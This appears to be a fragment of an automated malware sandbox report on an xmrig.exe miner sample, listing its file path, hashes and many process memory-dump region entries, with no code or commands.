C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4524-16-0x000001F50DAD0000-0x000001F50DAF0000-memory.dmp

memory/4524-17-0x000001F50DD20000-0x000001F50DD40000-memory.dmp

memory/4524-18-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-20-0x000001F50F520000-0x000001F50F540000-memory.dmp

memory/4524-19-0x000001F50F500000-0x000001F50F520000-memory.dmp

memory/4524-21-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-22-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-23-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-25-0x000001F50F520000-0x000001F50F540000-memory.dmp

memory/4524-24-0x000001F50F500000-0x000001F50F520000-memory.dmp

memory/4524-26-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-27-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-28-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-29-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-30-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-31-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-32-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-33-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-34-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-35-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-36-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-37-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-38-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-39-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-40-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-41-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-42-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-43-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-44-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-45-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-46-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-47-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-48-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-49-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-50-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-51-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-52-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-53-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-54-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-55-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-56-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-57-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-58-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-59-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-60-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-61-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-62-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-63-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-64-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-65-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-66-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-67-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-68-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-69-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-70-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-71-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-72-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-73-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-74-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-75-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-76-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-77-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-78-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-79-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-80-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-81-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-82-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-83-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp

memory/4524-84-0x00007FF7AB860000-0x00007FF7AC363000-memory.dmp